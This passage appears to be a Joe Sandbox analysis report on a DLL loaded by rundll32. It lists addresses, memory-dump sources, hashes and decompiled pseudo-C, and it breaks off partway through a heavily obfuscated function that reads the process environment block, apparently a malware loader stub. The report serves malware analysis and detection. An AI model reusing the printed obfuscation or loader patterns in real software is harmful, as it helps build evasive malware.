                0x7ffa535e14e8
                0x7ffa535e14ee
                0x7ffa535e14f5
                0x7ffa535e14fd
                0x7ffa535e14fd
                0x7ffa535e1501
                0x7ffa535e1505
                0x7ffa535e1505
                0x7ffa535e1509
                0x7ffa535e1510
                0x7ffa535e1517
                0x7ffa535e151e
                0x7ffa535e1525
                0x7ffa535e152c
                0x7ffa535e1537
                0x7ffa535e153e
                0x7ffa535e1545
                0x7ffa535e1549
                0x7ffa535e1554
                0x7ffa535e155b
                0x7ffa535e1566
                0x7ffa535e156d
                0x7ffa535e1574
                0x7ffa535e1577
                0x7ffa535e157a
                0x7ffa535e157d
                0x7ffa535e1581
                0x7ffa535e1585
                0x7ffa535e158c
                0x7ffa535e158f
                0x7ffa535e15a4
                0x7ffa535e15b8
                0x7ffa535e15d6
                0x7ffa535e15e4
                0x7ffa535e1600
                0x7ffa535e1622
                0x7ffa535e1633
                0x7ffa535e163e
                0x7ffa535e164c
                0x7ffa535e1661
                0x7ffa535e1681
                0x7ffa535e169b
                0x7ffa535e16a5
                0x7ffa535e16af
                0x7ffa535e16b3
                0x7ffa535e16b6
                0x7ffa535e16ba
                0x7ffa535e16c2
                0x7ffa535e16cc
                0x7ffa535e16da
                0x7ffa535e16e5
                0x7ffa535e16e9
                0x7ffa535e16ee
                0x7ffa535e16f8
                0x7ffa535e16fd
                0x7ffa535e1704
                0x7ffa535e1709
                0x7ffa535e1715
                0x7ffa535e1718
                0x7ffa535e1732
                0x7ffa535e1745
                0x7ffa535e1753
                0x7ffa535e175a
                0x7ffa535e1767
                0x7ffa535e1774
                0x7ffa535e177b
                0x7ffa535e1785
                0x7ffa535e1789
                0x7ffa535e1790
                0x7ffa535e1794
                0x7ffa535e179e
                0x7ffa535e17aa
                0x7ffa535e17ae
                0x7ffa535e17b6
                0x7ffa535e17bb
                0x7ffa535e17c0
                0x7ffa535e17c9
                0x7ffa535e17e6
                0x7ffa535e1800
                0x7ffa535e1823
                0x7ffa535e1841
                0x7ffa535e184f
                0x7ffa535e1856
                0x7ffa535e1871
                0x7ffa535e1886
                0x7ffa535e18a7
                0x7ffa535e18c3
                0x7ffa535e18c7
                0x7ffa535e18cb
                0x7ffa535e18d2
                0x7ffa535e18d6
                0x7ffa535e18e4
                0x7ffa535e18e7
                0x7ffa535e18eb
                0x7ffa535e18fb
                0x7ffa535e1902
                0x7ffa535e1906
                0x7ffa535e190b
                0x7ffa535e1910
                0x7ffa535e1915
                0x7ffa535e191a
                0x7ffa535e191e
                0x7ffa535e191e
                0x7ffa535e1925
                0x7ffa535e1931
                0x7ffa535e194b
                0x7ffa535e1967
                0x7ffa535e196e
                0x7ffa535e1987
                0x7ffa535e1995
                0x7ffa535e199c
                0x7ffa535e19a3
                0x7ffa535e19c7
                0x7ffa535e1a07
                0x7ffa535e1a0b
                0x7ffa535e1a23
                0x7ffa535e1a38
                0x7ffa535e1a46
                0x7ffa535e1a53
                0x7ffa535e1a63
                0x7ffa535e1a6d
                0x7ffa535e1a71
                0x7ffa535e1a7b
                0x7ffa535e1a87
                0x7ffa535e1a8b
                0x7ffa535e1a90
                0x7ffa535e1a95
                0x7ffa535e1a99
                0x7ffa535e1aa2
                0x7ffa535e1aa5
                0x7ffa535e1aa9
                0x7ffa535e1ac2
                0x7ffa535e1ad0
                0x7ffa535e1ae1
                0x7ffa535e1b17
                0x7ffa535e1b70
                0x7ffa535e1b93
                0x7ffa535e1bc1
                0x7ffa535e1bd3
                0x7ffa535e1bea
                0x7ffa535e1bf3
                0x7ffa535e1c0a
                0x7ffa535e1c11
                0x7ffa535e1c1d
                0x7ffa535e1c35
                0x7ffa535e1c3b
                0x7ffa535e1c49
                0x7ffa535e1c4f
                0x7ffa535e1c56
                0x7ffa535e1c59
                0x7ffa535e1c5e
                0x7ffa535e1c79
                0x7ffa535e1c94
                0x7ffa535e1c9d
                0x7ffa535e1cbc
                0x7ffa535e1cd3
                0x7ffa535e1cdc
                0x7ffa535e1cec
                0x7ffa535e1cf0

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: HeapProcess$AllocCloseCriticalExitHandleLeaveSection
                • String ID:
                • API String ID: 126649667-0
                • Opcode ID: 4b38d50d65ddf06cecd7d8751ab8fe2c6599f940d285598a8d05519128601b9e
                • Instruction ID: d47ff28244b39d2eb5a565c67a9f8f57efc8ec61dd40c4b8f80ae60d5faafcb5
                • Opcode Fuzzy Hash: 4b38d50d65ddf06cecd7d8751ab8fe2c6599f940d285598a8d05519128601b9e
                • Instruction Fuzzy Hash: 1F3206B2A10A908AEB54CF69E898BAD37B9F78878CF054526DF4D97B54CF38D550CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E59AC Relevance: 9.2, APIs: 6, Instructions: 236COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E00007FFA7FFA535E59AC(void* __ecx, intOrPtr* __rax, void* __rcx, void* __rdx) {
				void* _t1;

				if (__rcx != 0) goto 0x535e59dd;
				_t1 = E00007FFA7FFA535E8380(__rax);
				 *__rax = 0x16;
				E00007FFA7FFA535E8260(_t1);
				return 0x16;
			}




                0x7ffa535e59c0
                0x7ffa535e59c2
                0x7ffa535e59cc
                0x7ffa535e59ce
                0x7ffa535e59dc

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1405656091-0
                • Opcode ID: 51c102ac9c2419231c36bf96dfe509cc6b16db95cb78000b505dd5ce6fe17035
                • Instruction ID: 6a254501618ceb464c2463a5cf7c6ddc1d39466bc1bcfdd50d903b4257d67876
                • Opcode Fuzzy Hash: 51c102ac9c2419231c36bf96dfe509cc6b16db95cb78000b505dd5ce6fe17035
                • Instruction Fuzzy Hash: 6A81D8B2B14B464FEB589F34C9513B923AAEF85788F08E475DA0D9A785EF3CE4009700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E8054 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 65%
                			E00007FFA7FFA535E8054(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* _t36;
				void* _t37;
				void* _t38;
				int _t40;
				void* _t43;
				void* _t44;
				intOrPtr _t52;
				signed long long _t62;
				long long _t65;
				_Unknown_base(*)()* _t86;
				void* _t90;
				void* _t91;
				void* _t93;
				signed long long _t94;
				struct _EXCEPTION_POINTERS* _t100;

				_t45 = __ecx;
				 *((long long*)(_t93 + 0x10)) = __rbx;
				 *((long long*)(_t93 + 0x18)) = __rsi;
				_t3 = _t93 - 0x4f0; // -1288
				_t91 = _t3;
				_t94 = _t93 - 0x5f0;
				_t62 =  *0x53754140; // 0x9bd95a2971b4
				 *(_t91 + 0x4e0) = _t62 ^ _t94;
				_t52 = r8d;
				_t44 = __ecx;
				if (__ecx == 0xffffffff) goto 0x535e8093;
				_t37 = E00007FFA7FFA535E3724(_t36);
				_t5 = _t94 + 0x70; // 0x58
				r8d = 0x98;
				_t38 = E00007FFA7FFA535E3F50(_t37, __ecx, 0, _t52, __esp, _t5, _t86, __r8);
				_t6 = _t91 + 0x10; // -1272
				r8d = 0x4d0;
				E00007FFA7FFA535E3F50(_t38, _t45, 0, _t52, __esp, _t6, _t86, __r8);
				_t7 = _t94 + 0x70; // 0x58
				 *((long long*)(_t94 + 0x48)) = _t7;
				_t10 = _t91 + 0x10; // -1272
				_t65 = _t10;
				 *((long long*)(_t94 + 0x50)) = _t65;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t65 == 0) goto 0x535e8126;
				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
				_t16 = _t94 + 0x60; // 0x48
				 *((long long*)(_t94 + 0x30)) = _t16;
				_t19 = _t94 + 0x58; // 0x40
				 *((long long*)(_t94 + 0x28)) = _t19;
				_t21 = _t91 + 0x10; // -1272
				 *((long long*)(_t94 + 0x20)) = _t21;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
				_t25 = _t91 + 0x508; // 0x0
				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
				 *((long long*)(_t91 + 0xa8)) = _t25 + 8;
				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
				 *((intOrPtr*)(_t94 + 0x74)) = _t52;
				_t40 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t86, _t90);
				if (UnhandledExceptionFilter(_t100) != 0) goto 0x535e8188;
				if (_t40 != 0) goto 0x535e8188;
				if (_t44 == 0xffffffff) goto 0x535e8188;
				_t43 = E00007FFA7FFA535E3724(_t42);
				E00007FFA7FFA535F51E0();
				return _t43;
			}



















                0x7ffa535e8054
                0x7ffa535e8054
                0x7ffa535e8059
                0x7ffa535e8062
                0x7ffa535e8062
                0x7ffa535e806a
                0x7ffa535e8071
                0x7ffa535e807b
                0x7ffa535e8082
                0x7ffa535e8087
                0x7ffa535e808c
                0x7ffa535e808e
                0x7ffa535e8095
                0x7ffa535e809a
                0x7ffa535e80a0
                0x7ffa535e80a7
                0x7ffa535e80ab
                0x7ffa535e80b1
                0x7ffa535e80b6
                0x7ffa535e80bb
                0x7ffa535e80c4
                0x7ffa535e80c4
                0x7ffa535e80c8
                0x7ffa535e80cd
                0x7ffa535e80e2
                0x7ffa535e80e5
                0x7ffa535e80ee
                0x7ffa535e80f0
                0x7ffa535e80f6
                0x7ffa535e8103
                0x7ffa535e810b
                0x7ffa535e8110
                0x7ffa535e8115
                0x7ffa535e8119
                0x7ffa535e8120
                0x7ffa535e812d
                0x7ffa535e8134
                0x7ffa535e813f
                0x7ffa535e8143
                0x7ffa535e8151
                0x7ffa535e8155
                0x7ffa535e8159
                0x7ffa535e8163
                0x7ffa535e8176
                0x7ffa535e817a
                0x7ffa535e817f
                0x7ffa535e8183
                0x7ffa535e8192
                0x7ffa535e81ae

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                • String ID:
                • API String ID: 1239891234-0
                • Opcode ID: 6ab7a5c12a0407af041816abddc0eba39aeae19ebafb7fd608393c2a948a6a94
                • Instruction ID: f429eeaa50d87a529be4717e38f090dfb5aaf64696a15ceccdf1ef425ecd3830
                • Opcode Fuzzy Hash: 6ab7a5c12a0407af041816abddc0eba39aeae19ebafb7fd608393c2a948a6a94
                • Instruction Fuzzy Hash: D731B436628F818ADB20CF25E8402AE73A9FBC5794F485135EA8D53B98DF3CD145CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535EDE00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 62%
                			E00007FFA7FFA535EDE00(void* __edx, void* __edi, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
				long long _v72;
				intOrPtr _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t33;
				void* _t36;
				void* _t37;
				void* _t45;
				intOrPtr* _t68;
				signed long long _t70;
				long long _t72;
				long long _t74;
				intOrPtr* _t78;
				long long _t80;
				void* _t85;
				intOrPtr* _t87;
				void* _t92;
				long long* _t100;
				long long _t106;
				long long _t110;
				void* _t112;
				intOrPtr* _t114;
				void* _t116;
				void* _t119;
				intOrPtr _t131;
				void* _t133;
				void* _t134;
				signed long long _t135;
				signed long long _t136;
				signed long long _t139;
				intOrPtr* _t140;

				_t100 = __rdx;
				_t87 = __rcx;
				_t68 = __rax;
				_a8 = __rbx;
				_a16 = __rdx;
				_t78 = __rcx;
				if (__rdx != 0) goto 0x535ede3c;
				_t33 = E00007FFA7FFA535E8380(__rax);
				_t3 = _t110 + 0x16; // 0x16
				 *__rax = _t3;
				E00007FFA7FFA535E8260(_t33);
				goto 0x535edfdc;
				asm("xorps xmm0, xmm0");
				 *_t100 = _t110;
				asm("movdqu [ebp-0x20], xmm0");
				_v72 = _t110;
				if ( *_t87 == _t110) goto 0x535edea7;
				_a24 = 0x3f2a;
				_a26 = dil;
				_t36 = E00007FFA7FFA535F2864(_t45, __edx,  *_t78,  &_a24);
				if (_t68 != 0) goto 0x535ede7e;
				r8d = 0;
				_t37 = E00007FFA7FFA535EE00C(_t36, _t78,  *_t78,  &_a24, _t110, _t112, _t116, _t119,  &_v88);
				goto 0x535ede8a;
				0x535ee11c();
				r14d = _t37;
				if (_t37 != 0) goto 0x535ede9a;
				goto 0x535ede4e;
				goto 0x535edfa0;
				_t114 = _v88;
				_t131 = _v80;
				_a24 = _t110;
				_t70 = _t131 - _t114;
				_t139 = (_t70 >> 3) + 1;
				_t92 =  >  ? _t110 : _t70 + 7 >> 3;
				_t136 = _t135 | 0xffffffff;
				if (_t92 == 0) goto 0x535edf09;
				_t72 = _t136 + 1;
				if ( *((intOrPtr*)( *_t114 + _t72)) != dil) goto 0x535edeea;
				if (_t110 + 1 != _t92) goto 0x535edee4;
				_a24 = _t110 + 1 + _t72;
				r8d = 1;
				E00007FFA7FFA535E72EC(_t37, _t139, _t110 + 1 + _t72, _t110 + 1);
				_t80 = _t72;
				if (_t72 == 0) goto 0x535edf99;
				_t106 = _t72 + _t139 * 8;
				_t140 = _t114;
				_v96 = _t106;
				_a32 = _t106;
				if (_t114 == _t131) goto 0x535edf8f;
				_v104 = _t80 - _t114;
				_t133 = _t136 + 1;
				if ( *((intOrPtr*)( *_t140 + _t133)) != dil) goto 0x535edf49;
				_t134 = _t133 + 1;
				if (E00007FFA7FFA535F1998(_t80, _t106, _t106 - _t106 + _a24, _t134) != 0) goto 0x535edff4;
				_t74 = _a32;
				 *((long long*)(_v104 + _t140)) = _t74;
				_a32 = _t74 + _t134;
				if (_t140 + 8 != _t131) goto 0x535edf43;
				r14d = 0;
				 *_a16 = _t80;
				E00007FFA7FFA535E7E58(_a16, _v104);
				_t85 =  >  ? _t110 : _t131 - _t114 + 7 >> 3;
				if (_t85 == 0) goto 0x535edfd1;
				E00007FFA7FFA535E7E58(_a16,  *_t114);
				if (_t110 + 1 != _t85) goto 0x535edfbd;
				E00007FFA7FFA535E7E58(_a16, _t114);
				return r14d;
			}






































                0x7ffa535ede00
                0x7ffa535ede00
                0x7ffa535ede00
                0x7ffa535ede00
                0x7ffa535ede05
                0x7ffa535ede1e
                0x7ffa535ede24
                0x7ffa535ede26
                0x7ffa535ede2b
                0x7ffa535ede2e
                0x7ffa535ede30
                0x7ffa535ede37
                0x7ffa535ede3c
                0x7ffa535ede3f
                0x7ffa535ede45
                0x7ffa535ede4a
                0x7ffa535ede4e
                0x7ffa535ede57
                0x7ffa535ede5d
                0x7ffa535ede61
                0x7ffa535ede6c
                0x7ffa535ede72
                0x7ffa535ede77
                0x7ffa535ede7c
                0x7ffa535ede85
                0x7ffa535ede8a
                0x7ffa535ede8f
                0x7ffa535ede98
                0x7ffa535edea2
                0x7ffa535edea7
                0x7ffa535edeae
                0x7ffa535edeb8
                0x7ffa535edebc
                0x7ffa535edec9
                0x7ffa535eded7
                0x7ffa535ededb
                0x7ffa535edee2
                0x7ffa535edeea
                0x7ffa535edef1
                0x7ffa535edf03
                0x7ffa535edf05
                0x7ffa535edf09
                0x7ffa535edf15
                0x7ffa535edf1a
                0x7ffa535edf20
                0x7ffa535edf22
                0x7ffa535edf26
                0x7ffa535edf29
                0x7ffa535edf30
                0x7ffa535edf37
                0x7ffa535edf3f
                0x7ffa535edf49
                0x7ffa535edf50
                0x7ffa535edf55
                0x7ffa535edf69
                0x7ffa535edf6f
                0x7ffa535edf7b
                0x7ffa535edf86
                0x7ffa535edf8d
                0x7ffa535edf93
                0x7ffa535edf96
                0x7ffa535edf9b
                0x7ffa535edfb4
                0x7ffa535edfbb
                0x7ffa535edfc0
                0x7ffa535edfcf
                0x7ffa535edfd4
                0x7ffa535edff3

                APIs
                • _invalid_parameter_noinfo.LIBCMT ref: 00007FFA535EDE30
                  • Part of subcall function 00007FFA535E8280: IsProcessorFeaturePresent.KERNEL32(00007FFA535EF385), ref: 00007FFA535E8289
                  • Part of subcall function 00007FFA535E8280: GetCurrentProcess.KERNEL32(00007FFA535EF385), ref: 00007FFA535E82AD
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                • String ID: *?$.
                • API String ID: 4036615347-3972193922
                • Opcode ID: 6d596129e1decb9b41ca20d2be82681836e38efb530b16a80fb35605405d6583
                • Instruction ID: bdd56421e6d2085a6da203f47ace1649a748ade4d58a299038f3c52643143aa3
                • Opcode Fuzzy Hash: 6d596129e1decb9b41ca20d2be82681836e38efb530b16a80fb35605405d6583
                • Instruction Fuzzy Hash: 8A51D462B24F958DEB10DFA298104BC67AAEF99BD4B489171EE1D27B85EE3CD4419300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535EE00C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00007FFA7FFA535EE00C(void* __eax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
				signed long long _t16;
				signed long long _t17;
				void* _t25;
				signed long long _t34;

				_t16 = _t34;
				 *((long long*)(_t16 + 8)) = __rbx;
				 *((long long*)(_t16 + 0x10)) = __rbp;
				 *((long long*)(_t16 + 0x18)) = __rsi;
				 *((long long*)(_t16 + 0x20)) = __rdi;
				_t17 = _t16 | 0xffffffff;
				_t25 = _t17 + 1;
				if ( *((char*)(__rcx + _t25)) != 0) goto 0x535ee03c;
				if (_t25 + __rdx - _t17 - __r8 <= 0) goto 0x535ee077;
				return __rdx + 0xb;
			}







                0x7ffa535ee00c
                0x7ffa535ee00f
                0x7ffa535ee013
                0x7ffa535ee017
                0x7ffa535ee01b
                0x7ffa535ee029
                0x7ffa535ee03c
                0x7ffa535ee043
                0x7ffa535ee053
                0x7ffa535ee076

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID: .
                • API String ID: 0-248832578
                • Opcode ID: 98f0a0a0ffbd8457f511dbff3d5ba58b21ea4657e0e46df95334be7b8c4eb98f
                • Instruction ID: fb856f5e73ae919ce4d53792a4feedd2fe93005318ce6fe3635bb32224fb5c0e
                • Opcode Fuzzy Hash: 98f0a0a0ffbd8457f511dbff3d5ba58b21ea4657e0e46df95334be7b8c4eb98f
                • Instruction Fuzzy Hash: 9831EA22B24F9149F7609B3298057A9AA96AFC6BE4F0CD235DE6C17BC5DE3CD5018300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F6E94 Relevance: 3.5, APIs: 2, Instructions: 513threadCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 52%
                			E00007FFA7FFA535F6E94(void* __ebx, void* __ecx, void* __edx, long long __rbx, void* __rcx, void* __rdx, signed int __r8, long long __r9, void* __r10) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t362;
				signed int _t367;
				long _t371;
				intOrPtr _t406;
				signed int _t410;
				signed int _t453;
				intOrPtr _t455;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				void* _t476;
				long long _t494;
				signed long long _t545;
				signed long long _t558;
				long long _t585;
				long long _t616;
				signed long long _t645;
				signed long long _t662;
				signed int _t672;
				void* _t677;
				void* _t680;
				void* _t682;
				void* _t684;
				void* _t685;
				signed int _t687;
				signed long long _t688;
				signed long long _t690;
				void* _t695;
				signed long long _t696;
				void* _t697;
				long long _t700;
				void* _t702;
				void* _t705;
				signed long long _t707;
				void* _t709;

				_t695 = __r10;
				_t687 = __r8;
				 *((long long*)(_t684 + 0x20)) = __rbx;
				_t685 = _t684 - 0xa0;
				r10d =  *(_t685 + 0x120);
				_t406 =  *((intOrPtr*)(_t685 + 0x108));
				 *(_t685 + 0xe0) = __rdx + 0x946;
				r9d =  *(_t685 + 0x110);
				r12d = __r10 - 0x1fda;
				r9d = r9d + 0x771;
				 *(_t685 + 0xe8) = __rcx - 0x8f0;
				r14d = __rbx - 0xb9a;
				r15d = _t476 - 0x4f3;
				 *(_t685 + 0x80) = r9d;
				_t462 = _t476 + 0x1ff;
				 *((intOrPtr*)(_t685 + 0x94)) = r12d;
				 *(_t685 + 0x8c) = _t462;
				r10d = r10d + 0xfffff845;
				 *((intOrPtr*)(_t685 + 0x88)) = __r8 - 0x1c76;
				 *(_t685 + 0x90) = r15d;
				_t362 = __r8 - 0x6fc;
				 *((intOrPtr*)(_t685 + 0x98)) = _t362;
				r11d = __rdx + 0x3ae;
				 *(_t685 + 0xf0) = r11d;
				_t453 = __rdx + 0xcba;
				 *(_t685 + 0x118) = r10d;
				r9d = __rcx - 8;
				 *(_t685 + 0x120) = _t453;
				 *(_t685 + 0x100) = r9d;
				r8d = 0x10ae;
				if (r15d - _t406 > 0) goto 0x535f7553;
				if (_t462 - _t362 + 0xfffffda6 > 0) goto 0x535f7049;
				 *((long long*)(__r9 + 0x410)) =  *(__r9 + 0x240) + 0x128;
				 *((intOrPtr*)(__r9 + 0x348)) = 0x116000;
				 *((long long*)(__r9 + 0xf0)) = 0x80000000;
				r14d = r14d - 0x11e;
				 *((intOrPtr*)(_t685 + 0x108)) = _t406 + 0xfffff373;
				 *((long long*)( *(__r9 + 0x2a0) + 0x420)) =  *((intOrPtr*)(__r9 + 0x5e8)) + 0x58;
				 *( *((intOrPtr*)(__r9 + 0x358)) + 0x1a8) =  *( *((intOrPtr*)(__r9 + 0x358)) + 0x1a8) * ( *((intOrPtr*)( *(__r9 + 0x110) + 0x68)) - 0x11f1);
				 *((short*)(__r9 + 0x100)) = ( *( *((intOrPtr*)(__r9 + 0x358)) + 0x1b0) & 0x0000ffff) - 0x1fd3;
				_t585 = __r9 + 0x1d8;
				 *((intOrPtr*)(__r9 + 0x380)) = 0x400;
				 *(_t685 + 0x84) = __rdx - 0x1320 + 0x12ad;
				 *((intOrPtr*)( *(__r9 + 0x2a0) + 0xc0)) =  *((intOrPtr*)( *(__r9 + 0x2a0) + 0xc0)) - ( *( *(__r9 + 0x2a0) + 0x5d0) ^ 0x0000181f);
				 *( *((intOrPtr*)(__r9 + 0x5e8)) + 0x130) =  *( *((intOrPtr*)(__r9 + 0x5e8)) + 0x130) *  *( *((intOrPtr*)(__r9 + 0x358)) + 0x128);
				 *( *((intOrPtr*)(__r9 + 0x358)) + 0x128) =  *( *((intOrPtr*)(__r9 + 0x358)) + 0x128) + 1;
				 *((long long*)(__r9 + 0x2b0)) = E00007FFA7FFA535FB25C;
				 *((long long*)(__r9 + 0x2b8)) = E00007FFA7FFA535FB5B0;
				 *((long long*)(__r9 + 0x2c0)) = 0x7ffa535e1cf8;
				 *((long long*)(__r9 + 0x398)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0x1d0)) - 0x1355;
				 *((long long*)( *((intOrPtr*)(__r9 + 0x5e8)) + 0x3d0)) = __r9 + 0x390;
				_t494 =  *[gs:0x60];
				 *((long long*)(__r9 + 0x638)) = _t494;
				 *((long long*)(__r9 + 0x640)) =  *((intOrPtr*)( *((intOrPtr*)(_t494 + 0x18)) + 0x10));
				 *((long long*)(__r9 + 0x468)) = _t585;
				 *((long long*)( *((intOrPtr*)(__r9 + 0x5e8)) + 0x310)) = 0x1fd7;
				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0xc8)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0xc8)) + ( *( *(__r9 + 0x110) + 0x88) ^ __r8);
				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x468)))) =  *((intOrPtr*)( *(__r9 + 0x108) + 0x148)) + 0x64ed16;
				 *( *((intOrPtr*)(__r9 + 0x468)) + 4) =  *( *(__r9 + 0x240) + 0x70) ^ 0x006e14f5;
				r8d = 0x157a;
				 *( *((intOrPtr*)(__r9 + 0x160)) + 0x410) =  *( *((intOrPtr*)(__r9 + 0x160)) + 0x410) * ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x20)) + 0x138)) - __r8);
				 *( *((intOrPtr*)(__r9 + 0x358)) + 0x300) =  *( *((intOrPtr*)(__r9 + 0x358)) + 0x300) |  *((intOrPtr*)(__r9 + 0x20)) + 0x00000088;
				 *( *((intOrPtr*)(__r9 + 0x468)) + 8) =  *( *((intOrPtr*)(__r9 + 0x5e8)) + 0x2a8) ^ 0x006c2171;
				 *( *(__r9 + 0x108) + 0x3d0) =  *( *(__r9 + 0x108) + 0x3d0) ^ 0x00001ed2;
				 *( *((intOrPtr*)(__r9 + 0x160)) + 0x4b0) =  *( *((intOrPtr*)(__r9 + 0x160)) + 0x4b0) |  *( *((intOrPtr*)(__r9 + 0x160)) + 0x128) ^ __r8;
				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x468)) + 0xc)) =  *( *((intOrPtr*)(__r9 + 0x358)) + 0x1b0) + 0x31e059;
				_t662 =  *(__r9 + 0x240);
				r11d = r11d + 0xa46;
				 *(_t685 + 0xf0) = r11d;
				r15d = 0x1ba7;
				 *(_t662 + 0x198) =  *(_t662 + 0x198) * ( *( *(__r9 + 0x2a0) + 0x3c0) | __r8);
				r12d = 0x1ec0;
				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x468)) + 0x10)) =  *( *(__r9 + 0x240) + 0x70) + 0x63eba7;
